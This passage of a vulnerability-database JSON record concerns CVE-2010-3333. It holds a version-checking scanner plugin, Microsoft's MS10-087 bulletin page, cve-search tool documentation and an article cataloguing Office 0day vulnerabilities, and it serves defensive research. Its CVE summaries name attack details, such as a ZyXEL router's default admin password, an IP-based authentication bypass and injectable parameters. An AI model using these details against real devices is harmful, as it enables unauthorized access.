toupper(share);\n file = ereg_replace(pattern:\"[A-Za-z]:(.*)\", replace:\"\\1\", string:path + file);\n ver = GetVer(file:file, share:share);\n return ver;\n}\n\nofficeVer = get_kb_item(\"MS/Office/Ver\");\n\n## MS Office XP, 2003, 2007, 2010\nif(officeVer && officeVer =~ \"^1[0124]\\.\")\n{\n path = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\", item:\"CommonFilesDir\");\n if(! 
path) {\n exit(0);\n }\n\n foreach ver (make_list(\"OFFICE10\", \"OFFICE11\", \"OFFICE12\", \"OFFICE14\"))\n {\n offPath = path + \"\\Microsoft Shared\\\" + ver;\n dllVer = FileVer(file:\"\\Mso.dll\", path:offPath);\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"10.0\", test_version2:\"10.0.6866.9\") ||\n version_in_range(version:dllVer, test_version:\"11.0\", test_version2:\"11.0.8328.9\") ||\n version_in_range(version:dllVer, test_version:\"12.0\", test_version2:\"12.0.6545.5003\")||\n version_in_range(version:dllVer, test_version:\"14.0\", test_version2:\"14.0.5128.4999\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:52:51", "bulletinFamily": "microsoft", "cvelist": ["CVE-2010-3336", "CVE-2010-3337", "CVE-2010-3334", "CVE-2010-3335", "CVE-2010-3333", "CVE-2010-2573"], "description": "<html><body><p>Description of the vulnerabilities in Microsoft Office could allow remote code execution.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS10-087. 
To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/updates/bulletins/201011.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/updates/bulletins/201011.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms10-087.mspx\" id=\"kb-link-3\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/ms10-087.mspx</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Additional information about this security update</h3> <br/><br/> <br/>For more information about this security 
update and for information about any known issues with specific releases of this software, click the following article numbers to view the articles in the Microsoft Knowledge Base: <br/><br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2289161\" id=\"kb-link-8\">2289161 </a> MS10-087: Description of the security update for Office 2010: November 9, 2010</li><li><a href=\"https://support.microsoft.com/en-us/help/2289158\" id=\"kb-link-9\">2289158 </a> MS10-087: Description of the security update for 2007 Office System: November 9, 2010 </li><li><a href=\"https://support.microsoft.com/en-us/help/2289187\" id=\"kb-link-10\">2289187 </a> MS10-087: Description of the security update for Office 2003: November 9, 2010 <br/><br/><div class=\"indent\"><span class=\"text-base\">Known issues in security update 2289187:\u00a0</span></div><div class=\"indent\">After you install this security update, you may not be able to view or insert certain image files into Microsoft Office documents. For more information about this issue, click the following article number to view the article in the Microsoft Knowledge Base:\u00a0</div><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2479871\" id=\"kb-link-11\">2479871 </a> Security settings for graphic filters for Microsoft Office 2010, the 2007 Microsoft Office system, Microsoft Office 2003, and Microsoft Office XP</div></li><li><a href=\"https://support.microsoft.com/en-us/help/2289169\" id=\"kb-link-12\">2289169 </a> MS10-087: Description of the security update for Office XP: November 9, 2010 <br/><br/><div class=\"indent\"><span class=\"text-base\">Known issues in security update 2289169:</span></div><ul class=\"sbody-free_list\"><li>After you install this security update, you may not be able to view or insert certain image files into Microsoft Office documents. 
For more information about this issue, click the following article number to view the article in the Microsoft Knowledge Base:\u00a0 <br/><br/> <br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2479871\" id=\"kb-link-13\">2479871 </a> Security settings for graphic filters for Microsoft Office 2010, the 2007 Microsoft Office system, Microsoft Office 2003, and Microsoft Office XP</div></li><li>After you install this security update, you may have to accept the Microsoft Software License Terms when you start a Microsoft Office XP program. If you do not accept the Microsoft Software License Terms, the Office XP program may not start.</li></ul></li><li><a href=\"2454823\" id=\"kb-link-14\" target=\"_self\">2454823</a> Description of the Microsoft Office for Mac 2011 14.0.1 Update </li></ul></div></body></html>", "edition": 2, "modified": "2014-06-21T14:34:09", "id": "KB2423930", "href": "https://support.microsoft.com/en-us/help/2423930/", "published": "2014-06-21T14:34:09", "title": "MS10-087: Vulnerabilities in Microsoft Office could allow remote code execution", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "n0where": [{"lastseen": "2019-05-29T18:37:16", "bulletinFamily": "tools", "cvelist": ["CVE-2013-3588", "CVE-2008-1255", "CVE-2014-4162", "CVE-2012-4341", "CVE-2008-1257", "CVE-2008-1256", "CVE-2010-3333", "CVE-2008-1254", "CVE-2013-6786"], "description": "cve-search is a tool to import CVE (Common Vulnerabilities and Exposures) and CPE (Common Platform Enumeration) into a MongoDB to facilitate search and processing of CVEs. \n\nThe main objective of the software is to avoid doing direct and public lookup into the public CVE databases. This is usually faster to do local lookups and limits your sensitive queries via the Internet. 
\n\ncve-search includes a back-end to store vulnerabilities and related information, an intuitive web interface for searching and managing vulnerabilities, a series of tools to query the system and a web API interface. \n\ncve-search is used by many organizations including the [ public CVE services of CIRCL ](<https://cve.circl.lu/>) . \n\n* * *\n\n## Requirements \n\n * Python 3.3 or later \n * MongoDB 2.2 or later \n * redis server \n * Pip3 \n * PyMongo \n * Flask \n * Flask-PyMongo \n * Flask-Login \n * Tornado \n * Whoosh \n * Redis \n * Python-dateutil \n * passlib \n * feedformater (for RSS and Atom dump_last) [ http://code.google.com/p/feedformatter/ ](<http://code.google.com/p/feedformatter/>)\n * Whoosh [ http://packages.python.org/Whoosh/ ](<http://packages.python.org/Whoosh/>) (If you\u2019re planning to use the Full-text indexer) \n * irc \n * sleekxmpp \n * Werkzeug \n * Jinja2 \n * itsdangerous \n * click \n\nThe requirements can be installed with pip: \n \n \n sudo pip3 install -r requirements.txt\r\n \n\n## Installation of MongoDB \n\nFirst, you\u2019ll need to have a Python 3 installation (3.3 or higher). Then you need to install MongoDB (2.2) from source (this should also work with any standard packages from your favorite distribution). Don\u2019t forget to install the headers for development while installing MongoDB. You can go to [ http://docs.mongodb.org/manual/installation/ ](<http://docs.mongodb.org/manual/installation/>) to get the packages for your distribution, or [ http://www.mongodb.org/downloads ](<http://www.mongodb.org/downloads>) for the source code. \n\n## Populating the database \n\nFor the initial run, you need to populate the CVE database by running: \n \n \n ./sbin/db_mgmt.py -p\r\n ./sbin/db_mgmt_cpe_dictionary.py\r\n ./sbin/db_updater.py -c\r\n \n\nIt will fetch all the existing XML files from the Common Vulnerabilities and Exposures database and the Common Platform Enumeration. 
The initial Common Platform Enumeration (CPE) import might take some time depending on your configuration. \n\nIf you want to add the cross-references from NIST, Red Hat and other vendors: \n \n \n ./sbin/db_mgmt_ref.py\r\n \n\nMore detailed documentation can be found in the Documentations folder of the project. \n\n## Databases and collections \n\nThe MongoDB database is called cvedb and there are 11 collections: \n\n * cves (Common Vulnerabilities and Exposure items) \u2013 source NVD NIST \n * cpe (Common Platform Enumeration items) \u2013 source NVD NIST \n * cwe (Common Weakness Enumeration items) \u2013 source NVD NIST \n * capec (Common Attack Pattern Enumeration and Classification) \u2013 source NVD NIST \n * ranking (ranking rules per group) \u2013 local cve-search \n * d2sec (Exploitation reference from D2 Elliot Web Exploitation Framework) \u2013 source d2sec.com \n * [ MITRE Reference Key/Maps ](<https://cve.mitre.org/data/refs/>) \u2013 source MITRE reference Key/Maps \n * ms \u2013 (Microsoft Bulletin (Security Vulnerabilities and Bulletin)) \u2013 source [ Microsoft ](<http://www.microsoft.com/en-us/download/details.aspx?id=36982>)\n * exploitdb (Offensive Security \u2013 Exploit Database) \u2013 source [ offensive security ](<https://github.com/offensive-security/exploit-database>)\n * info (metadata of each collection like last-modified) \u2013 local cve-search \n * via4 [ VIA4CVE ](<https://github.com/cve-search/VIA4CVE>) cross-references. \n\nThe Redis server has 3 databases: \n\n * 10: The cpe (Common Platform Enumeration) cache \u2013 source MongoDB cvedb collection cpe \n * 11: The notification database \u2013 source cve-search \n * 12: The [ CVE reference database ](<https://cve.mitre.org/data/refs/>) is a cross-reference database mapping CVE ids to various vendor IDs \u2013 source NVD NIST/MITRE \n\nThe reference database has 3 additional sources: \n\n * [ MITRE Reference Key/Maps ](<https://cve.mitre.org/data/refs/>) . 
\n * Red Hat RPM to CVE database. \n * Red Hat RHSA Oval database. \n\n## Updating the database \n\nAn updater script runs the db_mgmt_* scripts for you: \n \n \n ./sbin/db_updater.py -v\r\n \n\nYou can run it from a crontab; logging goes to syslog by default. \n\n## Repopulating the database \n\nTo drop and re-populate all the databases in one step: \n \n \n ./sbin/db_updater.py -v -f\r\n \n\nThis will drop all the existing external sources and reimport everything. This operation can take some time and it\u2019s usually only required when parsing of new attributes is added to cve-search. \n\n## Usage \n\nYou can search the database using search.py: \n \n \n ./bin/search.py -p cisco:ios:12.4\r\n ./bin/search.py -p cisco:ios:12.4 -o json\r\n ./bin/search.py -f nagios -n\r\n ./bin/search.py -p microsoft:windows_7 -o html\r\n \n\nTo search all the WebEx vulnerabilities and print only the official references from the supplier: \n \n \n ./bin/search.py -p webex: -o csv -v \"cisco\"\r\n \n\nYou can also dump the JSON for a specific CVE ID: \n \n \n ./bin/search.py -c CVE-2010-3333\r\n \n\nOr you can use the XMPP bot: \n \n \n ./bin/search_xmpp.py -j mybot@jabber.org -p strongpassword\r\n \n\nOr dump the last 2 CVE entries in RSS or Atom format: \n \n \n ./bin/dump_last.py -f atom -l 2\r\n \n\nOr you can use the web interface: \n \n \n ./web/index.py\r\n \n\n## Usage of the ranking database \n\nThere is a ranking database that lets you rank software vulnerabilities based on their Common Platform Enumeration name. The ranking can be done per organization or department within your organization or any meaningful name for you. \n\nAs an example, you can add a partial CPE name like \u201csap:netweaver\u201d which is very critical for your accounting department. 
\n \n \n ./sbin/db_ranking.py -c \"sap:netweaver\" -g \"accounting\" -r 3\r\n \n\nand then you can look up the ranking (-r option) for a specific CVE-ID: \n \n \n ./bin/search.py -c CVE-2012-4341 -r -n\r\n \n\n## Advanced usage \n\nAs cve-search is based on a set of tools, it can be used and combined with standard Unix tools. If you ever wonder which vendors most often use the term \u201cunknown\u201d for their vulnerabilities: \n \n \n python3 bin/search_fulltext.py -q unknown -f | jq -c '. | .vulnerable_configuration[0]' | cut -f5 -d: | sort | uniq -c | sort -nr | head -10\r\n \r\n 1500 oracle\r\n 381 sun\r\n 372 hp\r\n 232 google\r\n 208 ibm\r\n 126 mozilla\r\n 103 microsoft\r\n 100 adobe\r\n 78 apple\r\n 68 linux\r\n \n\nYou can compare CVSS (Common Vulnerability Scoring System) values of products based on their CPE name, for example comparing oracle:java with sun:jre and using R to compute some statistics on their CVSS values: \n \n \n python3 bin/search.py -p oracle:java -o json | jq -r '.cvss' | Rscript -e 'summary(as.numeric(read.table(file(\"stdin\"))[,1]))'\r\n Min. 1st Qu. Median Mean 3rd Qu. Max.\r\n 1.800 5.350 9.300 7.832 10.000 10.000\r\n \r\n \r\n python3 bin/search.py -p sun:jre -o json | jq -r '.cvss' | Rscript -e 'summary(as.numeric(read.table(file(\"stdin\"))[,1]))'\r\n Min. 1st Qu. Median Mean 3rd Qu. Max.\r\n 0.000 5.000 7.500 7.333 10.000 10.000\r\n \n\n## Fulltext indexing \n\nIf you want to index all the CVEs from your current MongoDB collection: \n \n \n ./sbin/db_fulltext.py\r\n \n\nthen you can query the fulltext index (to get a list of matching CVE-IDs): \n \n \n ./bin/search_fulltext.py -q NFS -q Linux\r\n \n\nor query the fulltext index and output the JSON object for each CVE-ID: \n \n \n ./bin/search_fulltext.py -q NFS -q Linux -f\r\n \n\n## Fulltext visualization \n\nThe fulltext indexer visualization uses the fulltext indexes to build a list of the most common keywords used in CVE. 
[ NLTK ](<http://nltk.org/>) is required to generate the keywords with the most common English stopwords and lemmatize the output. [ NLTK for Python 3 ](<http://nltk.org/nltk3-alpha/>) exists but you need to use the alpha version of NLTK. \n \n \n ./bin/search_fulltext.py -g -s >cve.json\r\n \n\nYou can see a visualization on the [ demo site ](<http://www.foo.be/cve/>) . \n\n## Web interface \n\nThe web interface is a minimal interface to see the latest CVE entries and query a specific CVE. You\u2019ll need Flask in order to run the website and [ Flask-PyMongo ](<http://flask-pymongo.readthedocs.org/en/latest/>) . To start the web interface: \n \n \n cd ./web\r\n ./index.py\r\n \n\nThen you can connect on [ http://127.0.0.1:5000/ ](<http://127.0.0.1:5000/>) to browse the latest CVEs. \n\n## Web API interface \n\nThe web interface includes a minimal JSON API to get CVEs by ID, by vendor or by product. A public version of the API is also accessible on [ cve.circl.lu ](<https://cve.circl.lu/>) . \n\nList the known vendors in JSON: \n \n \n curl http://127.0.0.1:5000/api/browse/\r\n \n\nDump the products of a specific vendor in JSON: \n \n \n curl http://127.0.0.1:5000/api/browse/zyxel \r\n {\r\n \"product\": [\r\n \"n300_netusb_nbg-419n\",\r\n \"n300_netusb_nbg-419n_firmware\",\r\n \"p-660h-61\",\r\n \"p-660h-63\",\r\n \"p-660h-67\",\r\n \"p-660h-d1\",\r\n \"p-660h-d3\",\r\n \"p-660h-t1\",\r\n \"p-660h-t3\",\r\n \"p-660hw\",\r\n \"p-660hw_d1\",\r\n \"p-660hw_d3\",\r\n \"p-660hw_t3\"\r\n ],\r\n \"vendor\": \"zyxel\"\r\n }\r\n \n\nFind the vulnerabilities associated with a vendor and a product: \n \n \n curl http://127.0.0.1:5000/api/search/zyxel/p-660hw\r\n [{\"cwe\": \"CWE-352\", \"references\": [\"http://www.exploit-db.com/exploits/33518\", \"http://secunia.com/advisories/58513\", \"http://packetstormsecurity.com/files/126812/Zyxel-P-660HW-T1-Cross-Site-Request-Forgery.html\", \"http://osvdb.org/show/osvdb/107449\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw:_t1:v3\"], 
\"Published\": \"2014-06-16T14:55:09.713-04:00\", \"id\": \"CVE-2014-4162\", \"Modified\": \"2014-07-17T01:07:29.683-04:00\", \"cvss\": 6.8, \"summary\": \"Multiple cross-site request forgery (CSRF) vulnerabilities in the Zyxel P-660HW-T1 (v3) wireless router allow remote attackers to hijack the authentication of administrators for requests that change the (1) wifi password or (2) SSID via a request to Forms/WLAN_General_1.\"}, {\"cwe\": \"CWE-20\", \"references\": [\"http://www.kb.cert.org/vuls/id/893726\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660h-63:-\", \"cpe:/h:zyxel:p-660h-t1:-\", \"cpe:/h:zyxel:p-660h-d3:-\", \"cpe:/h:zyxel:p-660h-t3:v2\", \"cpe:/h:zyxel:p-660h-t1:v2\", \"cpe:/h:zyxel:p-660h-d1:-\", \"cpe:/h:zyxel:p-660h-67:-\", \"cpe:/h:zyxel:p-660h-61:-\", \"cpe:/h:zyxel:p-660hw_t3:v2\", \"cpe:/h:zyxel:p-660hw_t3:-\", \"cpe:/h:zyxel:p-660hw_d3:-\", \"cpe:/h:zyxel:p-660hw_d1:v2\", \"cpe:/h:zyxel:p-660hw_d1:-\", \"cpe:/h:zyxel:p-660hw:_t1:v2\", \"cpe:/h:zyxel:p-660hw:_t1:-\"], \"Published\": \"2014-04-01T23:58:16.967-04:00\", \"id\": \"CVE-2013-3588\", \"Modified\": \"2014-04-02T11:29:53.243-04:00\", \"cvss\": 7.8, \"summary\": \"The web management interface on Zyxel P660 devices allows remote attackers to cause a denial of service (reboot) via a flood of TCP SYN packets.\"}, {\"cwe\": \"CWE-79\", \"references\": [\"http://osvdb.org/ref/99/rompager407.pdf\", \"http://osvdb.org/99694\", \"http://antoniovazquezblanco.github.io/docs/advisories/Advisory_RomPagerXSS.pdf\"], \"vulnerable_configuration\": [\"cpe:/h:d-link:dsl-2640r:-\", \"cpe:/h:d-link:dsl-2641r:-\", \"cpe:/h:huawei:mt882:-\", \"cpe:/h:sitecom:wl-174:-\", \"cpe:/h:tp-link:td-8816:-\", \"cpe:/a:allegrosoft:rompager:4.07\", \"cpe:/h:zyxel:p-660hw_d1:-\"], \"Published\": \"2014-01-16T14:55:04.607-05:00\", \"id\": \"CVE-2013-6786\", \"Modified\": \"2014-01-17T11:01:47.353-05:00\", \"cvss\": 4.3, \"summary\": \"Cross-site scripting (XSS) vulnerability in Allegro RomPager before 4.51, as used 
on the ZyXEL P660HW-D1, Huawei MT882, Sitecom WL-174, TP-LINK TD-8816, and D-Link DSL-2640R and DSL-2641R, when the \\\"forbidden author header\\\" protection mechanism is bypassed, allows remote attackers to inject arbitrary web script or HTML by requesting a nonexistent URI in conjunction with a crafted HTTP Referer header that is not properly handled in a 404 page. NOTE: there is no CVE for a \\\"URL redirection\\\" issue that some sources list separately.\"}, {\"cwe\": \"CWE-79\", \"references\": [\"http://xforce.iss.net/xforce/xfdb/41109\", \"http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded\", \"http://www.gnucitizen.org/projects/router-hacking-challenge/\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw_t3:v2\", \"cpe:/h:zyxel:p-660hw:_t1:v2\", \"cpe:/h:zyxel:p-660hw_d1:v2\", \"cpe:/h:zyxel:p-660hw_t3:-\", \"cpe:/h:zyxel:p-660hw:_t1:-\", \"cpe:/h:zyxel:p-660hw_d3:-\", \"cpe:/h:zyxel:p-660hw_d1:-\"], \"Published\": \"2008-03-10T13:44:00.000-04:00\", \"id\": \"CVE-2008-1257\", \"Modified\": \"2012-05-31T00:00:00.000-04:00\", \"cvss\": 4.3, \"summary\": \"Cross-site scripting (XSS) vulnerability in Forms/DiagGeneral_2 on the ZyXEL P-660HW series router allows remote attackers to inject arbitrary web script or HTML via the PingIPAddr parameter.\"}, {\"id\": \"CVE-2008-1256\", \"references\": [\"http://xforce.iss.net/xforce/xfdb/41108\", \"http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded\", \"http://www.gnucitizen.org/projects/router-hacking-challenge/\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw\"], \"Published\": \"2008-03-10T13:44:00.000-04:00\", \"Modified\": \"2011-03-07T22:06:25.080-05:00\", \"cvss\": 10.0, \"summary\": \"The ZyXEL P-660HW series router has \\\"admin\\\" as its default password, which allows remote attackers to gain administrative access.\"}, {\"cwe\": \"CWE-264\", \"references\": [\"http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded\", 
\"http://www.gnucitizen.org/projects/router-hacking-challenge/\", \"http://xforce.iss.net/xforce/xfdb/41114\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw\"], \"Published\": \"2008-03-10T13:44:00.000-04:00\", \"id\": \"CVE-2008-1255\", \"Modified\": \"2008-09-05T17:37:15.440-04:00\", \"cvss\": 10.0, \"summary\": \"The ZyXEL P-660HW series router maintains authentication state by IP address, which allows remote attackers to bypass authentication by establishing a session from a source IP address of a previously authenticated user.\"}, {\"cwe\": \"CWE-352\", \"references\": [\"http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded\", \"http://www.gnucitizen.org/projects/router-hacking-challenge/\", \"http://xforce.iss.net/xforce/xfdb/41111\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw\"], \"Published\": \"2008-03-10T13:44:00.000-04:00\", \"id\": \"CVE-2008-1254\", \"Modified\": \"2008-09-05T17:37:15.287-04:00\", \"cvss\": 6.8, \"summary\": \"Multiple cross-site request forgery (CSRF) vulnerabilities on the ZyXEL P-660HW series router allow remote attackers to (1) change DNS servers and (2) add keywords to the \\\"bannedlist\\\" via unspecified vectors.\"}]\r\n \n\n[  ](<https://github.com/cve-search/cve-search>)\n", "edition": 4, "modified": "2017-10-30T00:56:57", "published": "2017-10-30T00:56:57", "id": "N0WHERE:172361", "href": "https://n0where.net/perform-local-searches-for-known-vulnerabilities-cve-search", "title": "Perform Local Searches For Known Vulnerabilities: cve-search", "type": "n0where", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2021-01-16T05:33:23", "bulletinFamily": "tools", "cvelist": ["CVE-2013-3588", "CVE-2008-1255", "CVE-2014-4162", "CVE-2012-4341", "CVE-2008-1257", "CVE-2008-1256", "CVE-2010-3333", "CVE-2008-1254", "CVE-2013-6786"], "description": "[  
](<https://2.bp.blogspot.com/-uP7vVDtJ5KI/WeBO05vuO-I/AAAAAAAAJIk/BTHzH_HwfHkbE_QJOdidzgSfixaib4PRwCLcBGAs/s1600/cve-search.png>)\n\ncve-search is a tool to import CVE (Common Vulnerabilities and Exposures) and CPE (Common Platform Enumeration) into a MongoDB to facilitate search and processing of CVEs. \n\n \n** Software using cve-search ** \n\n\n * [ cve-portal ](<https://www.github.com/CIRCL/cve-portal>) which is a CVE notification portal \n * [ cve-search-mt ](<https://www.github.com/NorthernSec/cve-search-mt>) which is a set of management tools for CVE-Search \n * [ cve-scan ](<https://www.github.com/NorthernSec/cve-scan>) which is a NMap CVE system scanner \n \n\n\n** [ Download cve-search ](<https://github.com/cve-search/cve-search>) **\n", "edition": 88, "modified": "2017-10-17T13:30:15", "published": "2017-10-17T13:30:15", "id": "KITPLOIT:4573857264821982104", "href": "http://www.kitploit.com/2017/10/cve-search-tool-to-perform-local.html", "title": "cve-search - A Tool To Perform Local Searches For Known Vulnerabilities", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-06-13T15:28:22", "bulletinFamily": "info", "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", 
"CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "description": "This article is an extended summary of my presentation at Bluehat Shanghai 2019. In it I summarize the Office-related 0day/1day vulnerabilities from 2010 to 2018, go through each vulnerability type once, and collect and categorize the published analyses of each vulnerability. \nI hope this article helps those who go on to do Office vulnerability research. \n\nOverview \nFrom 2010 to 2018, 0day/1day attacks against Office never stopped. The CVE numbers below are the 0day/1day vulnerabilities for which I observed real attack samples during my research (there may be omissions; readers are welcome to add to the list). \nFirst, the CVE numbers by year: \n2010: CVE-2010-3333 \n2011: CVE-2011-0609/CVE-2011-0611 \n2012: CVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013: CVE-2013-0634/CVE-2013-3906 \n2014: CVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015: CVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016: CVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017: CVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018: CVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nNext we classify the vulnerabilities above by the component involved. 
Note that Flash is itself an ActiveX control, but in the table below I put it in a class of its own. \nRTF control word parsing: CVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nOpen XML tag parsing: CVE-2015-1641/CVE-2017-11826 \nActiveX control parsing: CVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities: CVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing: CVE-2013-3906 \nOffice EPS file parsing: CVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nLoading via a Moniker: CVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerabilities: CVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then classify the non-Flash vulnerabilities above by vulnerability type. For a summary of the Flash vulnerabilities, refer to other researchers' articles. \nStack Overflow: CVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOut-of-bound Write: CVE-2014-1761/CVE-2016-7193 \nType Confusion: CVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nUse After Free: CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger Overflow: CVE-2013-3906 \nLogical vulnerability: CVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext, following the second table above and leaving the Flash vulnerabilities aside, we look at these vulnerabilities one by one. 
\n\nRTF control word parsing problem \nCVE-2010-3333 \nThis vulnerability was found by wushi, head of the Cohen laboratory. It is a stack overflow vulnerability. \nThere are many analyses of it on the see snow forum; here are a few: \nCVE-2010-3333 vulnerability analysis (in-depth analysis) \nMS10-087: from vulnerability to patch to POC \nChapter 2, Section 4 of the book The Vulnerability War also gives a fairly systematic description of this vulnerability; interested readers can read that chapter. \nCVE-2014-1761 \nThis vulnerability is a 0day found by Google. It is a heap out-of-bounds write vulnerability. \nLi Haifei did an excellent analysis of it: \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nThe see snow forum also has two high-quality analyses of this vulnerability: \nCVE-2014-1761 analysis notes \nms14-017 (cve-2014-1761) study notes, which mention how to set up the correct environment \nThe security agent also has a high-quality analysis: \nTeaching you hand by hand how to construct Office exploits (part 3) \nIn addition, South Korea's AhnLab published a report on this vulnerability: \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nNote when debugging this vulnerability that some samples have quite strict environment requirements to trigger; the articles above mention how to build a suitable test environment. \nCVE-2016-7193 \nThis vulnerability is a 0day reported to Microsoft by the Austrian Military Cyber Emergency Readiness Team. \nIt is also a heap out-of-bounds write vulnerability. \nBaidu Security Labs did a fairly complete analysis of it: 
\nAPT attack weapon: the Word vulnerability CVE-2016-7193 and its principles revealed \nI also wrote an article on exploiting this vulnerability: \nBuilding a calc-popping CVE-2016-7193 exploit from an in-the-wild sample \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle's 0day summary table lists this as one of the 2015 0days. \nIt is a type confusion vulnerability. \nThe fly tower wrote an analysis of this vulnerability: \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe also wrote an excellent analysis: \nWord type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has an excellent analysis: \nTeaching you hand by hand how to construct Office exploits (part 4) \nThe Know Chong Yu 404 lab also wrote an excellent analysis: \nCVE-2015-1641 Word exploit sample analysis \nI have also written an article on the principles of this vulnerability: \nIdeas for analyzing Open XML tag parsing vulnerabilities \nWhen debugging Office samples that involve heap spraying, pay special attention to the fact that attaching a debugger tends to change the process heap layout, in particular some heap option settings. If the sample does not trigger normally while debugging, that is often the result of launching the sample directly from the debugger; in that case, try double-clicking the sample and then attaching the debugger. 
\n", "edition": 1, "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "title": "Office vulnerabilities from a macro perspective, 2010-2018 - vulnerability warning - the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}